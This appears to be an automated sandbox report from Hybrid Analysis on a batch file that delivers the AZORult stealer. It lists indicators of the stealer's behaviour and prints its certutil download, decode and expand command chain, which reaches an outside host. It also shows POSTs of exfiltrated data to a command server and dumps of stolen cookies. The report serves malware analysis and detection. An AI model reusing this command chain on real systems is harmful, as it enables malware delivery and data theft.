VT6784985745.bat
This report is generated from a file or URL submitted to this webservice on July 12th 2018 16:54:49 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
- POSTs files to a webserver
- Stealer/Phishing
- Scans for artifacts that may help identify the target
- Persistence
- Spawns a lot of processes
- Fingerprint
-
Reads the active computer name
Reads the cryptographic machine GUID
Scans for artifacts that may help identify the target - Network Behavior
- Contacts 3 domains and 3 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 8d47306e29f859c02d9d0b82a58df4cb58e7ec88ffdaeacbc0264d8ca31b7f02
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
Anti-Detection/Stealthyness
-
Found a system process name at an unusual pathway
- details
- Process "sort.exe" has a system process name but is not located in a Windows (sub-)directory (Show Process)
- source
- Monitored Target
- relevance
- 3/10
- ATT&CK ID
- T1036 (Show technique in the MITRE ATT&CK™ matrix)
-
Uses certutil to decode a file (seen on targeted attacks)
- details
- Process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1140 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a system process name at an unusual pathway
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request" (SID: 2829988, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ETPRO TROJAN AZORult Variant.3 Checkin M1" (SID: 2829890, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN AZORult Variant.3 Checkin M2" (SID: 2831079, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation" - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
Installation/Persistance
-
Drops executable files to the Windows system directory
- details
-
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-synch-l1-2-0.dll"
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-file-l1-2-0.dll"
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll"
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll"
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-file-l2-1-0.dll"
File type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" was dropped at "%WINDIR%\SysWOW64\api-ms-win-core-localization-l1-2-0.dll" - source
- Binary File
- relevance
- 7/10
-
Drops executable files to the Windows system directory
-
Network Related
-
Found more than one unique User-Agent
- details
-
Found the following User-Agents: Microsoft-CryptoAPI/6.1
CertUtil URL Agent - source
- Network Traffic
- relevance
- 5/10
-
Found more than one unique User-Agent
-
Spyware/Information Retrieval
-
Detected network related fingerprinting/snooping attempt
- details
- Process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1087 (Show technique in the MITRE ATT&CK™ matrix)
-
Scans for artifacts that may help identify the target
- details
-
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676")
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001")
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002")
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003")
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
"ercg345c24.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Detected network related fingerprinting/snooping attempt
-
Unusual Characteristics
-
References suspicious system modules
- details
- "193.70.47.200:ITEMachineID : 18F76D5-A343A2EC-6B6BB927-99B5A429-0310E858AEXE_PATH : %TEMP%\ercg345c24.exeWindows : 6.1 x64 Windows 7 ProfessionalComputer(Username) : HAPUBWS-PC(HAPUBWS)Screen: 1024x611Layouts: EN/EN/LocalTime: 12/7/2018 16:58:39Zone: UTC+1:0CPU Model: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHzCPU Count: 2GetRAM: 8191Video InfoVirtualBox Graphics AdapterRDPDD Chained DDRDP Encoder Mirror DriverRDP Reflector Display Driver[System Process]Systemsmss.execsrss.exewininit.exeservices.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exetaskhost.exesvchost.exesvchost.exetaskhost.exelsass.exelsm.execsrss.execonhost.execonhost.execonhost.execonhost.exewinlogon.exeexplorer.execmd.exeercg345c24.exe +[Soft]Adobe AIR(27.0.0.124)Adobe Flash Player 27 ActiveX(27.0.0.187)Adobe Shockwave Player 12.3(12.3.1.201)AutoIt v3.3.14.2(3.3.14.2)WinPcap 4.1.3(4.1.0.2980)Java 8 Update 151(8.0.1510.12)Java 'lG["
- source
- File/Memory
- relevance
- 5/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns a lot of processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c ""C:\VT6784985745.bat" "" (Show Process)
Spawned process "certutil.exe" with commandline "certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt" (Show Process)
Spawned process "certutil.exe" with commandline "certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab" (Show Process)
Spawned process "expand.exe" with commandline "expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe" (Show Process)
Spawned process "ercg345c24.exe" (Show Process)
Spawned process "sort.exe" (Show Process)
Spawned process "cmd.exe" with commandline "/c timeout 4 & del "ercg345c24.exe"" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
References suspicious system modules
-
Suspicious Indicators 19
-
Anti-Detection/Stealthyness
-
Queries kernel debugger information
- details
- "certutil.exe" at 00011325-00003948-00000033-29986320382
- source
- API Call
- relevance
- 6/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "certutil.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries kernel debugger information
-
Environment Awareness
-
Contains ability to measure performance
- details
- rdtsc (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to query CPU information
- details
-
cpuid from ercg345c24.exe (PID: 3852) (Show Stream)
cpuid from sort.exe (PID: 2260) (Show Stream)
cpuid (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
- ATT&CK ID
- T1082 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the active computer name
- details
-
"certutil.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"ercg345c24.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
-
"certutil.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"ercg345c24.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to measure performance
-
General
-
Opened the service control manager
- details
- "ercg345c24.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
POSTs files to a webserver
- details
-
"POST /azs/index.php HTTP/1.0Host: login.giocherialaragnatela.itConnection: closeContent-Length: 113Accept-Language: en-USContent-Type: application/octet-stream" with no payload
"POST /azs/index.php HTTP/1.0Host: login.giocherialaragnatela.itConnection: closeContent-Length: 972929Accept-Language: en-USContent-Type: application/octet-stream" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Opened the service control manager
-
Installation/Persistance
-
Allocates virtual memory in a remote process
- details
- "cmd.exe" allocated memory in "\Device\MountPointManager"
- source
- API Call
- relevance
- 7/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Drops executable files
- details
-
"api-ms-win-core-synch-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-datetime-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"sort.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"api-ms-win-core-memory-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"vcruntime140.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"ucrtbase.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-heap-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-process-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"nss3.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-conio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"mozglue.dll" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"api-ms-win-crt-math-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-utility-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-util-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-environment-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-file-l1-2-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-libraryloader-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-stdio-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-crt-multibyte-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows"
"api-ms-win-core-processthreads-l1-1-0.dll" has type "PE32 executable (DLL) (console) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 10/10
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\SysWOW64\certutil.exe" (Handle: 128)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 128)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\certutil.exe" (Handle: 120)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\expand.exe" (Handle: 120) - source
- API Call
- relevance
- 6/10
-
Allocates virtual memory in a remote process
-
Spyware/Information Retrieval
-
Found an instant messenger related domain
- details
-
"10149366_pk_uid0%3DczoxNjoiYjg1ZmYxOGY4MTJkNTMwYSI7%3A_%3D0b4124c3f68703523c69e4f78478b81bb26b1f5fad-m.asiaFALSE/FALSE1610149366uidGgcd4dRWLNadtechus.comFALSE/FALSE1610149366JEB25A2EABA76E651AAEACFA26A4F6779337adtechus.comFALSE/FALSE1610149366ADMARKMon, 11 Dec 2017 17:17:02 GMTadtechus.comFALSE/FALSE1610149366APIDDAe8b48c64-de91-11e7-9669-00163e3d397dadtechus.comFALSE/FALSE1610149366APIDTS1513012532qip.ruFALSE/FALSE1610149366weather8cce5c9f22fede6d5188de4ff82c3c71bec1cabd855ecb56f51863d4b95843f7a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22weather%22%3Bi%3A1%3Bi%3A1%3B%7Dqip.ruFALSE/FALSE1610149366traffic35316ca82541db6674b3904ede5b46c2387c1e4ade7948fba472a4f80a3acb92a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22traffic%22%3Bi%3A1%3Bi%3A1%3B%7Dqip.ruFALSE/FALSE1610149366rb_shows25b2%261fqip.ruFALSE/FALSE1610149366rb_shows_day25b2-1%261f-1qip.ruFALSE/FALSE1610149366topLineSplit907qip.ruFALSE/FALSE1610149366_ym_uid1512498881708287895qip.ruFALSE/FALSE1610149366_gaGA1.2.1299367368.1512498873qip.ruFALSE/FALSE1610149366_gidGA1.2.1767792141.1512498881qip.ruFALSE/FALSE1610149366_ym_isad2qip.ruFALSE/FALSE1610149366_ym_visorc_24433871wmylife.comFALSE/FALSE1610149366usidb2b44c3d-bf68-4b4e-86df-8baf57094b49mylife.comFALSE/FALSE1610149366_uetsid_uet71bd3ac2mylife.comFALSE/FALSE1610149366_gaGA1.2.1343893056.1512497650mylife.comFALSE/'lG[." (Indicator: "qip.ru"; File: "network.pcap")
"511&nv=4&t=-&v=-&p=-&si=-&sn=-&od=none&op=-&ok=-&om=-&ob=-&oc=-&os=-&w=800&h=600&cd=24&f=27.0%20r0&g=-"cam.demdex.netFALSE/FALSE1610149366cam35928446970140592741233483160203094364dicascidade.com.brFALSE/FALSE1610149366__cfduidde37010b7dd940b30970ab2a5d67c5add1513011339global.blackberry.comFALSE/FALSE1610149366_gaGA1.3.1948344527.1512497695global.blackberry.comFALSE/FALSE1610149366_gidGA1.3.1357511246.1512497695mail.twc.comFALSE/FALSE1610149366sto-idGFEAAOGLmail.twc.comFALSE/FALSE1610149366aam_sc_twccaam_twcc%3D1mail.twc.comFALSE/FALSE1610149366aam_uuid35928446970140592741233483160203094364local.comFALSE/FALSE1610149366localcomcid=710&loc=Los+Angeles%2c+CA&ll=34.040729%2c-118.297396&zip=90001&kw=&uid=ed71465a-7f84-4b3d-a201-a16feb1e6c5e&ci=en&expdate=636511715975266649local.comFALSE/FALSE1610149366localcom_ybcid=&sid=6b86b7ea-d772-4bfa-a109-75637b6990f2&exp=636485813975266649local.comFALSE/FALSE1610149366locmpxeyJ1aWQiOiJlZDcxNDY1YS03Zjg0LTRiM2QtYTIwMS1hMTZmZWIxZTZjNWUifQ==local.comFALSE/FALSE1610149366locmpx.sigBOx3yNLwYFoO7bb46b2Y2asBe6Qlocal.comFALSE/FALSE1610149366__gadsID=1c286ee58a3c553c:T=1513011600:S=ALNI_MamozLKRMli_giWY3aDrjvuT5iqMglocal.comFALSE/FALSE1610149366_gaGA1.2.260031554.1512498081local.comFALSE/FALSE1610149366_gidGA1.2.1151867283.1512498087local.comFALSE/FALSE1610149366s_nr1512498087489local.comFA'lG[" (Indicator: "blackberry.com"; File: "network.pcap"), ".comafy11.netnytimes.comwww.huffingtonpost.esm.one.impact-ad.jpwww.expedia.comfsdn.comweborama.comstatse.webtrendslive.comwww.gov.uksmartadserver.comsony.jpautoitscript.comwww.kayak.esyoo7.comwww.miniclip.comadtech.dewww.zhcw.commediav.commtvnservices.comadhood.comwww.next.co.ukweb.defr.ebayrtm.comrum-dytrc.corriere.itintentmedia.netcount.pcauto.com.cnsanspo.comojogos.com.brmarktplaats.nltrtstats.topix.comtap2-cdn.rubiconproject.comyelp.comijinshan.comsddan.comhit.stat24.comq1.comsympatico.cawww.metacafe.comeonline.comoptimahub.comtiara.daum.netamericanairlines.esonlinedown.netwww.netshoes.com.brp.smartertravel.comwp.plkeyade.comgammaplatform.comleboncoin.fradsnative.comgo.comwww.goo.ne.jphubspot.netrevelist.commaxpark.comtrvl-px.comamazon.fremxdgt.comwww.chinaz.comzedo.comjs.spotx.tvojrq.netwww.haodf.comtypepad.comaltergeo.rusiteeuwest.slgnt.eumaktoob.comtheadex.comad8.adfarm1.adition.combumlam.comwww.att.comdailymotion.comblackberry.comaddthis.comamazon.comatdmt.comadsupplyssl.commercadoclics.comdyntrk.commozilla.orgsears.comcdnze.com3839.comwww.webmd.com2103950122.log.optimizely.comyahoo.com.twnative.aipbskids.orgliveinternet.ruwww.twoo.comthrough.auction.co.krdouban.commail.ru360daily.comwww.bing.comaccounts.google.comgoo.ne.jpwww.easyjet.c'lG[_[" (Indicator: "blackberry.com"; File: "network.pcap"), "netmatome.naver.jpwww.viamichelin.frwww.nextinsure.comapxlv.combild.dewww.tamgrt.com01net.comwww.liveadexchanger.comitau.com.brvancl.comom.elvenar.comwww.nifty.comt.fstrk.netsociomantic.comwww.toysrus.comservices.borderfree.comcarambo.laemail-reflex.comrentalcars.comnordstromimage.comwizard101.comziddu.comwww.xfinity.comgateway.foresee.comnetwork.bazaarvoice.comkp.rubitauto.comjd.comwww.excite.co.jpkdcl.pchome.com.twsync.company-target.comadlabs.ruclassmates.comsonymobcomm.tt.omtrdc.netsfr.frsync.shinobi.jpads.webkinz.comsbal4kp.comfixya.comsanook.comhls.dianping.comwww.gamezer.comomtrdc.netads.publicidad.netmyhard.com5ch.netwww.verizonwireless.comuniversal.iperceptions.comglassgret.comadserver01.deds1.digitalaudienz.comimvu.com200632758.log.optimizely.comgentags.netbuscape.com.bretao.combabylon.comallocine.frskype.comfunmoods.comprimecaster.netwww.ugdturner.comluxup.rucrsspxl.comtripadvisor.comit.altervista.orgmedia6degrees.comsxp.smartclip.netsouthwest.comstat.media621373388.log.optimizely.comnickjr.esnexage.comtinypic.comwww.peopleewnetwork.comautoscout24.deadvanseads.comwww.last.fmwn.comwww.t-online.deusi-saas.vnexpress.netads.linkedin.comtechnical-service.netspringserve.comwww.zoosk.comonet.tvyahoo.techads.infozhcw.comnba.hupu.comwww.hugedomains.comlivi'lG[" (Indicator: "skype.com"; File: "network.pcap"), "1.microsoft.comsky.comargos.co.ukmixi.jpimmobilienscout24.desoundcloud.comzynga.comnokia.comscanscout.comwww.stumbleupon.comteads.tvitaliaonline01.wt-eu02.netipinyou.comprf.hnwww.united.compublicidad.netsecureaud.solocpm.compopwal.itmyvisualiq.nettt-11106-6.seg.t.tailtarget.comv.6.cns.thebrighttag.comwordpress.comwww.travelocity.comflipboard.comsahcdn.comconnatix.comopendns.comvagalume.com.brliutilities.comc1exchange.coming.nlpclady.com.cnmatch.rundsp.comadmatrix.jpdeployads.comtorrentz.eugoogle.comwww.goal.comt.brand-server.comblogger.comglobal.nickjr.tvcollector-282.tvsquared.comr7.comcounter.scribblelive.comwww.webex.commlb.comseznam.czhotwire.comkameleoon.eufriend.ly96pk.commarca.comrp.liadm.comperfectmarket.combedbathandbeyond.comes.ign.comcom-lenovo.netmng.comwww.sony.compconline.com.cnplacelocal.comorange.demdex.netsohu.comstumbleupon.compxuno.combarclays.co.ukibm.comwunderground.comkidsafeseal.comyjtag.yahoo.co.jprutarget.ruwww.gumtree.comes.yahoo.comgemius.plcheapoair.comtt-10162-1.seg.t.tailtarget.comwww.shopathome.comit.ebayrtm.comverizon.comnaver.jptarget.compingdom.netwetter.comabtasty.comretailmenot.comdatamind.ruameba.jptelegraph.co.ukevents.ocdn.euem.nscontext.euwww.topix.combetsonsport.rutanx.comwww.zillow.comt-mobile.com17173.coms'lG[B]" (Indicator: "wire.com"; File: "network.pcap"), "unrulymedia.comcdn.viglink.comwww.lowes.comrec.udn.commarchex.iojxedt.combidswitch.netkeisu02.eproof.comsmartbmc.com.brat.atwola.cominner-active.mobikakao.comwebcollect.kugou.comspeedtest.netdrugs.comxunlei.comidntfy.runordstrom.comimpact-ad.jptribalfusion.comtinypass.comcomcast.inq.coml.qq.comaltervista.orgadtrue.combooking.comadbrn.comb.wishabi.comwww.teamviewer.comwcfbc.netokwave.jpwww.freeonlinegames.comwww.enfemenino.comoyunlar1.comxinhuanet.comsend.microadinc.combuycheapr.comintuit.cominnovid.commeishichina.comfoxnews.compch.comnicovideo.jpg.eclick.vnwww.bb.com.bradvg.jpmoshimonsters.compxtres.comwww.careerbuilder.comfilefreak.comdistrictm.ioolx.com.brsimpli.fiwww.geniuskitchen.comm.reachmax.cndragonfable.comwww.merriam-webster.commediatoday.rupoptropica.comkaixin001.comwww.asahi.comnifty.comdatadbs.comgoal.comorange.frwww.today.combankofamerica.comwebkinznewz.ganzworld.comirs01.comcpx.towww.homedepot.comi.liadm.commedia.netoverstock.comyldbt.comcm.adsafety.netmobile.deamazon.co.ukoi.com.bri-mobile.co.jp3lift.comdxpmedia.com766.comwww.fifa.comtacdn.comindeed.esalot.compchome.com.twhome.bt.comwushen.comtmz.comwww.so-net.ne.jpwww.mcmprod.hsbc.co.ukwww.y8.comit168.comztgame.comicq.comati-host.netturner.comwww.cafemom.comtheweathernetwork'lG[L]" (Indicator: "icq.com"; File: "network.pcap"), "adtechus.comqip.rumylife.comtechads.infomapquest.comsakura.ne.jpmynet.comwww.yahoo.comju.taobao.compaypal.comesmas.comking.combetweendigital.comtopix.comseesaa.jpmy.rtmark.netd2-apps.netscribblelive.comcox.comneural10.cdnwebcloud.commonografias.comwww.staples.comsamsclub.comsp.gmossp-sp.jpsmi2.netwww.oracle.comadsymptotic.comsocial.playstation.comgowatchfreemovies.tofreeskreen.comudn.comyieldlab.netjiayuan.comt.apontador.com.brnuggad.netboldchat.comgsspat.jpj.mrpdata.netkakaku.comwidespace.comttlbd.nettumblr.comxbox.comd.adroll.commilliyet.com.trbreak.comper.auction.co.krcardlytics.comstaples.comamazon-adsystem.comm6r.euoredero.comru4.comapontador.com.brsitescout.comec.hub2.com.plshoplocal.commtv.commsn.comnetlog.comgssprt.jpwww.aipai.comrecruit.112.2o7.netperimeterx.netplaystation.comcnet.comsecure.calcch.comtidaltv.comxg4ken.comabmr.netd-test.39.netyandex.rugry.plcartoonnetwork.esmacys.comtracead.comhlserve.comups.xplosion.dematrixspa.itsxy.hc360.comtynt.commpsnare.iesnare.comsdp-campaign.derareru.rucncn.comrmntpjs.comand.co.uksina.com.cnlightboxcdn.comenfemenino.commm.markandmini.comgo.flx1.comeasyjet.commember.auction.co.kravg.comc.appier.netstatic-chomikuj.pltheguardian.comintel.eswebspectator.comcbslocal.comgwallet.comviamichelin.'lG[
_" (Indicator: "qip.ru"; File: "network.pcap") - source
- File/Memory
- relevance
- 10/10
-
Found an instant messenger related domain
-
System Destruction
-
Marks file for deletion
- details
-
"%WINDIR%\SysWOW64\certutil.exe" marked "%WINDIR%\cerB423.tmp" for deletion
"%WINDIR%\SysWOW64\certutil.exe" marked "%WINDIR%\cerD4CA.tmp" for deletion
"%WINDIR%\SysWOW64\expand.exe" marked "%TEMP%\$dpx$.tmp" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp-shm" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp-wal" for deletion
"%TEMP%\ercg345c24.exe" marked "%TEMP%\2074536799844245989641.tmp" for deletion - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1107 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens file with deletion access rights
- details
-
"certutil.exe" opened "%WINDIR%\cerB423.tmp" with delete access
"certutil.exe" opened "%WINDIR%\cerD4CA.tmp" with delete access
"expand.exe" opened "%TEMP%\$dpx$.tmp\218f98763775034fb6c9e84dafefab70.tmp" with delete access
"expand.exe" opened "%TEMP%\$dpx$.tmp" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp-shm" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp-wal" with delete access
"ercg345c24.exe" opened "%TEMP%\2074536799844245989641.tmp" with delete access - source
- API Call
- relevance
- 7/10
-
Marks file for deletion
-
System Security
-
Modifies proxy settings
- details
-
"certutil.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"certutil.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"certutil.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Queries sensitive IE security settings
- details
- "certutil.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"cmd.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"certutil.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"certutil.exe" wrote bytes "c0df43771cf94277ccf842770d64447700000000c0118d7600000000fc3e8d7600000000e0138d76000000009457b47525e04377c6e0437700000000bc6ab37500000000cf318d76000000009319b475000000002c328d7600000000" to virtual address "0x75A71000" (part of module "NSI.DLL")
"certutil.exe" wrote bytes "7d07477781ed4577ae864477c6e04377effd46772d16457760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x71F81000" (part of module "WSHTCPIP.DLL")
"certutil.exe" wrote bytes "0efc467781ed4577ae864477c6e04377effd46772d164577c0fc4277da8f4d7760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x71F71000" (part of module "WSHIP6.DLL")
"expand.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"ercg345c24.exe" wrote bytes "711171027a3b7002ab8b02007f950200fc8c0200729602006cc805001ecd6d027d266d02" to virtual address "0x74D807E4" (part of module "USER32.DLL")
"ercg345c24.exe" wrote bytes "7d07477781ed4577ae864477c6e04377effd46772d16457760144777478d4477a8e243776089447700000000ad37f3768b2df376b641f37600000000" to virtual address "0x73941000" (part of module "WSHTCPIP.DLL")
"ercg345c24.exe" wrote bytes "c0df43771cf94277ccf842770d64447700000000c0118d7600000000fc3e8d7600000000e0138d76000000009457b47525e04377c6e0437700000000bc6ab37500000000cf318d76000000009319b475000000002c328d7600000000" to virtual address "0x75A71000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
